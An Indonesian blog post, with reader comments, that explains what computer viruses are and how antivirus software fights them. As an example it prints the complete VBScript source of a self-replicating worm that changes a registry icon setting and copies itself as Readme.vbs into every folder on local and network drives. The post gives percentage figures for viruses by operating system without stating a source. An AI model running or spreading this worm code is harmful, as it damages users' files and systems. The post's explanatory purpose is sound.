#
Anda membaca...
Komputer

Apa itu Virus Komputer?


Apa itu virus komputer?

computer_viruses.jpg

Virus Komputer

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak ( misalnya : dengan merusak data pada dokumen ), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali.

Virus komputer umumnya dapat merusak perangkat lunak ( Software ) komputer dan tidak dapat secara langsung merusak perangkat keras ( Hardware ) komputer terutama pada sistem operasi , seperti sistem operasi berbasis Microsoft Windows ( Windows 95, Windows 98/98SE, Windows NT, Windows NT Server, Windows 2000, Windows 2000 Server, Windows 2003, Windows 2003 Server, Windows XP Home Edition, Windows XP Professional, Windows XP Service Pack 1, Windows XP Service Pack 2 ) bahkan GNU/Linux. Efek negatif virus komputer terutama adalah perbanyakan dirinya sendiri, yang membuat sumber daya pada komputer ( seperti : CPU Time, penggunaan memori ) menjadi berkurang secara signifikan. Hampir 95% Virus adalah virus komputer berbasis sistim operasi Windows. Sisanya, 2% menyerang Linux/GNU (dan Unix, sebagai source dari Linux, tentunya), 1% menyerang Mac terutama Mac OS 9, Mac OS X (Tiger, Leopard), 2% lagi menyerang sistim operasi Unix, seperti : FreeBSD dan Sun Solaris.

Serangan virus dapat dicegah atau ditanggulangi dengan menggunakan perangkat lunak Anti Virus. Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer, asalkan basis data ( Database ) virus komputer yang dimiliki oleh perangkat lunak antivirus telah mengandung kode program untuk menghapus virus tersebut.

Untuk mengetahui sejarah adanya virus komputer, kamu dapat membaca di Sejarah Perkembangan Malware Dunia ( Jadi ngga cuma di sekolah aja belajar sejarah ya! 😉 ). Selain itu, untuk lebih memahami virus-virus lokal seperti : Brontok dan variannya, kamu bisa membacanya di sini. Beberapa triks untuk mengatasi serangan virus, dapat dilihat juga di tutorial cara mengatasi virus.

Supaya tahu lebih jauh tentang virus komputer, virus komputer dapat dibuat dengan bahasa pemrograman komputer, seperti : Visual Basic, Visual C++, VBS, JS, DOS Command, dan bahasa pemrograman lainnya. Sebagai contoh source code virus sederhana dengan menggunakan VBS, dapat dilihat pada Virus Readme dengan source code berikut :

'VOVAN//SMF Readme.a

Set A=CreateObject("Scripting.FileSystemObject")
Set B=CreateObject("WScript.Shell")
B.RegWrite "HKEY_CLASSES_ROOT\VBSFile\DefaultIcon","shell32.dll,-152"
Set C=A.Drives
For Each Drive In C
If Drive.DriveType=2 Or Drive.DriveType=3 Then Onward Drive.Path &"\"
Next
Function Onward(D)
Set E=A.GetFolder(D)
Set F=E.SubFolders
For Each G In F
A.CopyFile Wscript.ScriptFullName, G&"\Readme.vbs"
Onward(G)
Next
End Function

Dengan demikian, dapat diketahui bahwa virus komputer merupakan kode program yang disalahgunakan oleh programmer pembuat-nya, baik untuk kepentingan pribadi maupun untuk kepentingan lainnya, sehingga menimbulkan keresahan bagi pengguna komputer lain. Nah kalau begitu, kesimpulannya kembali ke tanggung jawab moral masing-masing dech! 😉

Do you agree?

Iklan

About devry

Just the way I am

Diskusi

12 thoughts on “Apa itu Virus Komputer?

  1. perasaan 😉

    Posted by Ash | 6 Juli 2010, 1:51 pm
  2. kalo bs bahas juga donk ttg AV (lengkap dengan source code tentunya)

    Posted by 1105 | 26 Oktober 2007, 3:38 pm
  3. @cupunk

    Silahkan virusnya dicoba sendiri aja dech! 😀
    atau kalo ngga bisa upload sampel virus tersebut ke Ansav Center atau ke CompactbyteAV untuk dianalisa lebih lanjut.

    Posted by devry | 8 Agustus 2007, 1:50 pm
  4. ada yang mau virus gua gak??tapi tanggung ndiri akibatnya ya!!!hehehehe….

    Posted by cupunk | 8 Agustus 2007, 1:28 pm
  5. @all

    Kalo buat antivirus lokal maupun anti malware, silahkan aja download di sini, link yang berhubungan dengan antivirus sudah gw referensikan.

    Oh ya, buat yang mau komentar silahkan baca dulu di Copyright. Supaya kita semua punya aturan yang sama, oke! 😉

    Posted by devry | 31 Juli 2007, 2:27 pm
  6. Virus????????????????????
    Gak banget dehhhhh!!!!!!!!!!!!!!!!!!!

    Posted by tIC_nIEz | 31 Juli 2007, 1:42 pm
  7. Duh ini dari sekolah dari mana sih kok norak bgt comment nya
    maybe baru bisa comment
    plz all kasih link anti virus nu entenk ya

    Posted by HartZ | 31 Juli 2007, 11:40 am
  8. virus itu gila abiezzzz,,,,,,,,,,,,,,,,,,,,

    Posted by sep-aw | 31 Juli 2007, 11:29 am
  9. baguuuuuuuuuuuuuuuuuuuuuuuuuuuusssssssssssssss!!!!!!!!!!!!!!!!!!!

    Posted by blinker start | 31 Juli 2007, 11:08 am
  10. need>antivirus enteng g banyak makan tpt hardisk ksih link nya ya ^_^

    Posted by HartZ | 31 Juli 2007, 10:52 am
  11. @purnama

    He he he… bener juga. Tetapi itu sebenarnya program proteksi yang prinsip kerjanya menyerupai virus komputer 🙂

    Kalo contoh virus komputer yang menyerang perangkat keras ( Hardware ), salah satu contohnya yang terkenal adalah virus CIH, yang menyerang sistem BIOS PC dan secara tak langsung merusak mainboard PC, serta yang terbaru varian virus Lightmoon yang merusak printer ( virus printer ).

    Posted by devry | 22 Juli 2007, 12:26 pm
  12. Lho, bukannya virus juga dapat menguntungkan…
    misalnya buat pertahanan cd2 musik/film asli, biar pas dibajak jadi rusak tuh bajakannya.

    Virus yg menyerang Hardware itu contohnya apa mas??

    Posted by purmana | 22 Juli 2007, 10:32 am

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Other Languages?

Tentang Blog Ini?

Semua tulisan sederhana pada blog ini merupakan tulisan personal bersifat Open Source. Terbuka bagi semua netter untuk pembelajaran kita bersama. Terutama bagi netter yang suka membaca, mencari dan menambah informasi serta wawasan yang membuka cakrawala dunia di internet. SEMOGA BERMANFAAT...

Total Track?

  • 1,288,438 visitors

Sharing This Blog?

Info Track?

%d blogger menyukai ini: